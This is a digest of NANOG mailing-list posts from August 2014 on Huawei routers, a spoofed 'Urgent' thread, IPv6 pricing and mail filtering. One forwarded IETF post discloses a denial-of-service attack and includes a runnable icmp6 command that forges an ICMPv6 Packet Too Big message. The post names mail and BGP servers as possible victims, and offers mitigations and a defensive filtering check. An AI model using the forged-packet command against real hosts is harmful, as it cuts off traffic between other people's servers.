Re: Huawei's Versatile Routing Platform (VRP)

2014-08-19 Thread Nikos Mouat


Hi Colton,
   I've been recently looking at the Huawei 12808 switch - I'm not sure 
if it's the same OS as the routers, but so far I've had a positive 
experience.
   I would say it's not very close at all to IOS - other than being 
command line - perhaps closer than Extreme's OS, but not by much.
   That being said, the '?' and tab keys are helpful, and if you 
understand the concepts, you can usually find the right knobs to turn. In 
addition, at least for me, the Huawei teams have been extraordinarily 
helpful in providing configuration templates and support.
   I think someone commented that it doesn't mix well with Cisco - I would 
throw in that that's probably only based on the fact that Huawei does not 
support PVST.


Thanks,
Nikos

On Tue, 19 Aug 2014, Colton Conor wrote:


How does Huawei's Versatile Routing Platform (VRP) operating system that is
on their switches and routers compare to Cisco IOS or Juniper JunOS? Is the
CLI syntax similar? How is the overall feature set? Would a tech that knows
cisco be able to understand Huawei fairly easy?

The pricing and feature set for Huawei's products are impressive, but no
one ever seems to talk about their products? They claim to have multiple
routers that smoke Cisco and Juniper platforms. We are talking Tbps
platforms. What are the overall thoughts on Huawei?



Re: Huawei's Versatile Routing Platform (VRP)

2014-08-19 Thread nanog
It works fine
The CLI syntax is quite similar to IOS in shape, but keywords are different
You won't (almost) understand everything on the fly, reading the
documentation is *not* an option (is it somewhere ?); By the way,
Huawei's documentation is a bit ugly, not as versatile as Cisco's; You
will have trouble understanding some features if you are "new" with
these (eg protocols, techs etc). If you master these, I guess the docs
will be more understandable for you.

I did not use them for routing but switching, they are performing
really well

If you plan to buy such product, keep in mind these points:
- don't mix Huawei & Cisco (or anything else), you might have trouble
(as you'll get with any other constructor mix)
- low cost switches seem to be less awesome than high-end products; You
may get more "not working" units;



On 19/08/2014 21:34, Colton Conor wrote:
> How does Huawei's Versatile Routing Platform (VRP) operating system that is
> on their switches and routers compare to Cisco IOS or Juniper JunOS? Is the
> CLI syntax similar? How is the overall feature set? Would a tech that knows
> cisco be able to understand Huawei fairly easy?
> 
> The pricing and feature set for Huawei's products are impressive, but no
> one ever seems to talk about their products? They claim to have multiple
> routers that smoke Cisco and Juniper platforms. We are talking Tbps
> platforms. What are the overall thoughts on Huawei?
> 



Re: Urgent

2014-08-19 Thread Tom Hill
On 19/08/14 22:43, Tom Hill wrote:
> Looks like I owe you a beer or two, Randy. :)

Or, more accurately, some happy soul has nominated that you shall
receiveth said beer tokens, by fortune of spoofed e-mails.. ;D

Tom


Re: Urgent

2014-08-19 Thread Tom Hill
On 18/08/14 18:00, ra...@psg.com wrote:
> Contact for God, please reach out to me offlist.

 [18:12:24] 12:38 <@teh-35425> Beer tokens to the man
that puts in a request to nanog-ml for 'Contact for God, please contact
me offlist'
 [18:12:36] teh-35425, looks like you owe rbush some
beer tokens

Looks like I owe you a beer or two, Randy. :)


Tom


Re: Huawei's Versatile Routing Platform (VRP)

2014-08-19 Thread Saku Ytti
On (2014-08-19 14:34 -0500), Colton Conor wrote:

Hi,

> How does Huawei's Versatile Routing Platform (VRP) operating system that is
> on their switches and routers compare to Cisco IOS or Juniper JunOS? Is the
> CLI syntax similar? How is the overall feature set? Would a tech that knows
> cisco be able to understand Huawei fairly easy?

If they know IOS they just need to change the nouns to some synonym and it's
the same.
And generally, if you know what you're doing, it's perfectly workable CLI. By
far nothing to write home about, but generally relying on CLI means there are
large inefficiencies in your process to address.
Overall the design is quite like IOS XE today, Linux where single flat process
'vrp' does all the heavy-lifting.

> The pricing and feature set for Huawei's products are impressive, but no
> one ever seems to talk about their products? They claim to have multiple
> routers that smoke Cisco and Juniper platforms. We are talking Tbps
> platforms. What are the overall thoughts on Huawei?

I recently opened Huawei AR router which is essentially competing with Cisco
ISR and to lesser degree with Juniper SRX. To my surprise it was all western
quality kit, Emerson PSU, Marvell ethernet chip, Cavium Octeon NPU/CPU, so
pretty similar to SRX in HW terms.

CX competes with ASR9k/MX, and NE as far as I know is like CX but more
core-focused marketing (like JNPR T is like MX for people with too much money)

I personally wouldn't have trouble committing heavily on Huawei kit if
economics otherwise make sense (training, systems, etc)

-- 
  ++ytti


Huawei's Versatile Routing Platform (VRP)

2014-08-19 Thread Colton Conor
How does Huawei's Versatile Routing Platform (VRP) operating system that is
on their switches and routers compare to Cisco IOS or Juniper JunOS? Is the
CLI syntax similar? How is the overall feature set? Would a tech that knows
cisco be able to understand Huawei fairly easy?

The pricing and feature set for Huawei's products are impressive, but no
one ever seems to talk about their products? They claim to have multiple
routers that smoke Cisco and Juniper platforms. We are talking Tbps
platforms. What are the overall thoughts on Huawei?


Re: QOS improvement suggestion for NANOG list members

2014-08-19 Thread Mike A
On Tue, Aug 19, 2014 at 06:09:50PM +, Sholes, Joshua wrote:
> Doesn't everyone do that?
> 
> NANOG was the list that taught me, twelve years ago, that I would suffer
> terribly if I didn't pre-sort individual mailing lists into their own
> folders. =)

Procmail, while not all that _friendly_, can be *useful*.

-- 
Mike Andrews, W5EGO
mi...@mikea.ath.cx
Tired old sysadmin 


Re: QOS improvement suggestion for NANOG list members

2014-08-19 Thread Sholes, Joshua
Doesn't everyone do that?

NANOG was the list that taught me, twelve years ago, that I would suffer
terribly if I didn't pre-sort individual mailing lists into their own
folders. =)

-- 
Josh


On 8/19/14, 1:44 PM, "Doug Barton"  wrote:
>
> or, learn how to filter e-mail into folders like the big kids. :)
>



Re: QOS improvement suggestion for NANOG list members

2014-08-19 Thread Doug Barton

On 8/19/14 7:15 AM, Rob McEwen wrote:

RE: QOS improvement suggestion for NANOG list members

Go to the search feature of your e-mail, and search for all messages
from the NANOG list that have the word "URGENT" in the subject line...
then delete them! Then, there will be a LESSER chance of overlooking a
truly urgent message from your own customers! (and hopefully that
thread will die soon! Otherwise, you may need to repeat this every
couple of days for a hopefully short while.) This might improve the
quality of service that you provide to your own clients.


 or, learn how to filter e-mail into folders like the big kids. :)



Fwd: DoS attacks (ICMPv6-based) resulting from IPv6 EH drops

2014-08-19 Thread Fernando Gont
Folks,

FYI -- currently being discussed on v6...@ietf.org

Cheers,
Fernando




 Forwarded Message 
Subject: DoS attacks (ICMPv6-based) resulting from IPv6 EH drops
Date: Tue, 19 Aug 2014 09:00:15 -0300
From: Fernando Gont 
To: IPv6 Operations 
CC: 'op...@ietf.org' 

Folks,

Ten days ago or so we published this I-D:


Section 5.2 of the I-D discusses a possible attack vector based on a
combination of "forged" ICMPv6 PTB messages and IPv6 frag drops by
operators, along with proposed countermeasures -- on which we'd like to
hear your comments.

Since Section 5.2 is in the draft, let me offer a more informal and
practical explanation:

1) It is known that filtering of packets containing IPv6 Extension
Headers (including the Fragment Header) is widespread (see our I-D above)

2) Let us assume that Host A is communicating with Server B, and that
some node filters fragments between Host A and Server B.

3) An attacker sends a spoofed ICMPv6 PTB to server B, with a "Next Hop
MTU" < 1280, in the hopes of eliciting "atomic fragments" (see
) from now on.

4) Now server B starts sending IPv6 atomic fragments... And since they
include a frag header (and in '2)' above we noted that frags are dropped
on that path), these packets get dropped (i.e., DoS).


"Demo" with the icmp6 tool
() -- (some addresses have
been changed (anonymized), but it is trivial to pick a victim server...)

("2001:db8:1:10:0:1991:8:25" is the server, and
"2001:5c0:1000:a::e7d" is my own address):

 cut here 
* First of all, I telnet to port 80 of the server, and
everything works as expected 

fgont@satellite:~$ telnet 2001:db8:1:10:0:1991:8:25 80
Trying 2001:db8:1:10:0:1991:8:25...
Connected to 2001:db8:1:10:0:1991:8:25.
Escape character is '^]'.
^CConnection closed by foreign host.

 Now I send the forged ICMPv6 PTB 

fgont@satellite:~$ sudo icmp6  --icmp6-packet-too-big -d
2001:db8:1:10:0:1991:8:25 --peer-addr 2001:5c0:1000:a::e7d --mtu 1000 -o
80 -v
icmp6: Security assessment tool for attack vectors based on ICMPv6 error
messages

IPv6 Source Address: 2001:5c0:1000:a::e7d (automatically selected)
IPv6 Destination Address: 2001:db8:1:10:0:1991:8:25
IPv6 Hop Limit: 227 (randomized)
ICMPv6 Packet Too Big (Type 2), Code 0
Next-Hop MTU: 1000
Payload Type: IPv6/TCP (default)
Source Address: 2001:db8:1:10:0:1991:8:25 (automatically-selected)
Destination Address: 2001:5c0:1000:a::e7d
Hop Limit: 237 (randomized)
Source Port: 80 Destination Port: 38189 (randomized)
SEQ Number: 734463213 (randomized)  ACK Number: 866605720 (randomized)
Flags: A (default)  Window: 18944 (randomized)  URG Pointer: 0 (default)
Initial attack packet(s) sent successfully.


* And now I try the same telnet command as above... but it fails,
because the frags from the server to me are getting dropped somewhere 

fgont@satellite:~$ telnet 2001:db8:1:10:0:1991:8:25 80
Trying 2001:db8:1:10:0:1991:8:25...
[timeout]
 cut here 


Of course, in this particular case I just "shot myself". But one could
do this to DoS connections between mailservers, etc.

A nice question is: what if e.g

1) some BGP servers accept ICMPv6 PTB that claim an MTU < 1280, and
react (as expected) by generating atomic fragments, *and*,

2) These same BGP servers deem fragmentation as "harmful", and hence
drop such fragments

you could essentially DoS traffic between them

As noted in the I-D, the mitigations seem to be:

1) Artificially limit your packets to 1280, and drop all incoming ICMPv6
PTB, or,

2) Have your device just drop ICMPv6 PTB that claim a Next-Hop MTU
smaller than 1280.

Thoughts?
-- 
Fernando Gont
SI6 Networks
e-mail: fg...@si6networks.com
PGP Fingerprint:  31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492







-- 
Fernando Gont
e-mail: ferna...@gont.com.ar || fg...@si6networks.com
PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1
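
Mitigation 2 from the message above (drop any ICMPv6 PTB that claims a Next-Hop MTU smaller than 1280), written out as a receive-side check. This is an added example, not code from the I-D or from the icmp6 tool; the function names are hypothetical, the outer packet is assumed to carry no extension headers, the ICMPv6 checksum is not verified, and the sample packets are constructed from documentation-prefix addresses.

```python
import socket
import struct

IPV6_MIN_MTU = 1280      # minimum IPv6 link MTU
ICMPV6 = 58              # Next Header value for ICMPv6
PTB = 2                  # ICMPv6 type: Packet Too Big


def ptb_verdict(packet: bytes) -> str:
    """Classify one inbound IPv6 packet (no extension headers assumed)."""
    if len(packet) < 40 or packet[0] >> 4 != 6:
        return "drop: not a complete IPv6 header"
    if packet[6] != ICMPV6:
        return "pass: not ICMPv6"
    icmp = packet[40:]
    if len(icmp) < 8:
        return "drop: truncated ICMPv6 header"
    icmp_type, _code, _cksum, mtu = struct.unpack("!BBHI", icmp[:8])
    if icmp_type != PTB:
        return "pass: not Packet Too Big"
    if mtu < IPV6_MIN_MTU:
        return f"drop: PTB claims Next-Hop MTU {mtu} < {IPV6_MIN_MTU}"
    inner = icmp[8:]
    # Extra sanity check: the quoted packet must have this host as its source.
    if len(inner) < 40 or inner[8:24] != packet[24:40]:
        return "drop: PTB does not quote a packet sent by this host"
    return f"accept: lower path MTU to {mtu}"


def build_ptb(src: str, dst: str, mtu: int, inner_src: str, inner_dst: str) -> bytes:
    """Constructed test packet: IPv6 + ICMPv6 PTB quoting a bare IPv6/TCP header."""
    def addr(text: str) -> bytes:
        return socket.inet_pton(socket.AF_INET6, text)
    inner = struct.pack("!IHBB", 6 << 28, 0, 6, 64) + addr(inner_src) + addr(inner_dst)
    icmp = struct.pack("!BBHI", PTB, 0, 0, mtu) + inner   # checksum left at 0
    header = struct.pack("!IHBB", 6 << 28, len(icmp), ICMPV6, 64)
    return header + addr(src) + addr(dst) + icmp


# Constructed addresses: the server receiving the PTB, its peer, an on-path router.
SERVER, PEER, ROUTER = "2001:db8:1::25", "2001:db8:2::e7d", "2001:db8:3::1"

if __name__ == "__main__":
    for mtu in (1000, 1280, 1400):
        print(mtu, ptb_verdict(build_ptb(ROUTER, SERVER, mtu, SERVER, PEER)))
```

The source-address comparison only rejects PTBs that quote someone else's traffic; a forged PTB that quotes a plausible packet still passes it, which is why the MTU floor is the check that addresses this attack.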





Re: Akamai charges for IPv6 support?

2014-08-19 Thread Valdis . Kletnieks
On Tue, 19 Aug 2014 14:32:38 -, "Eric C. Miller" said:
> I thought that keeping up with the times is part of basic necessity of 
> business.

Yes, but here in the US, a precedent got set when some communications companies
got given really sweet deals to encourage them to deploy next-gen broadband,
and the companies instead pocketed the money.  We're kind of stuck with this
sort of thing until Wall Street stops emphasizing quarterly profits over
long-term strategic development.





RE: Akamai charges for IPv6 support?

2014-08-19 Thread Eric C. Miller
I thought that keeping up with the times is part of basic necessity of business.



Eric Miller, CCNP
Network Engineering Consultant
(407) 257-5115



-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Matthew Kaufman
Sent: Monday, August 18, 2014 10:48 PM
To: Alejandro Acosta
Cc: nanog@nanog.org
Subject: Re: Akamai charges for IPv6 support?

I guess you expect infrastructure to build itself for free?

Matthew Kaufman

Sent from my iPad

> On Aug 18, 2014, at 7:30 PM, Alejandro Acosta 
>  wrote:
> 
> 
> 
> On 8/18/2014 12:23 PM, Aaron Hopkins wrote:
>> On Mon, 18 Aug 2014, Mehmet Akcin wrote:
>> 
>>> What did they say when you asked them(Akamai)?
>> 
>> I quoted their response in my mail; sorry if that wasn't clear.  They 
>> offered to enable IPv6 service for a non-trivial monthly recurring 
>> fee, which they offered to send me a revised contract to include.
> 
> it's so sad to hear this in August 2014
> 
>> 
>>> I would imagine ipv6 to be included in price not an additional fee.
>> 
>> I was surprised to find that wasn't the case.
>> 
>>-- Aaron


Re: Urgent

2014-08-19 Thread Michael Hallgren
On 19/08/2014 16:08, William Herrin wrote:
> On Mon, Aug 18, 2014 at 3:57 PM, Michael Hallgren  wrote:
>> On 18/08/2014 20:38, Jeroen van Aart wrote:
>> -Original Message-
>> Contact for God, please reach out to me offlist.
>>
>> Regards,
>>  -AS666 NOC
 --
>>> OP is a troll,
>> Sure? :-)
> Definitely.
>
> The message may _also_ have a forged sender. ;)

Yep, was joke/irony :-)

Cheers,
mh

>
> -Bill



QOS improvement suggestion for NANOG list members

2014-08-19 Thread Rob McEwen
RE: QOS improvement suggestion for NANOG list members

Go to the search feature of your e-mail, and search for all messages
from the NANOG list that have the word "URGENT" in the subject line...
then delete them! Then, there will be a LESSER chance of overlooking a
truly urgent message from your own customers! (and hopefully that
thread will die soon! Otherwise, you may need to repeat this every
couple of days for a hopefully short while.) This might improve the
quality of service that you provide to your own clients.

-- 
Rob McEwen
+1 (478) 475-9032



Re: Urgent

2014-08-19 Thread William Herrin
On Mon, Aug 18, 2014 at 3:57 PM, Michael Hallgren  wrote:
> On 18/08/2014 20:38, Jeroen van Aart wrote:

> -Original Message-
> Contact for God, please reach out to me offlist.
>
> Regards,
>  -AS666 NOC
>>> --

>> OP is a troll,
>
> Sure? :-)

Definitely.

The message may _also_ have a forged sender. ;)

-Bill


Re: Urgent

2014-08-19 Thread Joel M Snyder

> OP is a troll, best to ignore and block:

Be nice.  Randy can be abrasive, but calling him a troll seems out of 
line.  I like to think of him as a hobbit with shorter temper than 
average.


Not everyone here will agree with me :-)

jms
--
Joel M Snyder, 1404 East Lind Road, Tucson, AZ, 85719
Senior Partner, Opus One   Phone: +1 520 324 0494
j...@opus1.com    http://www.opus1.com/jms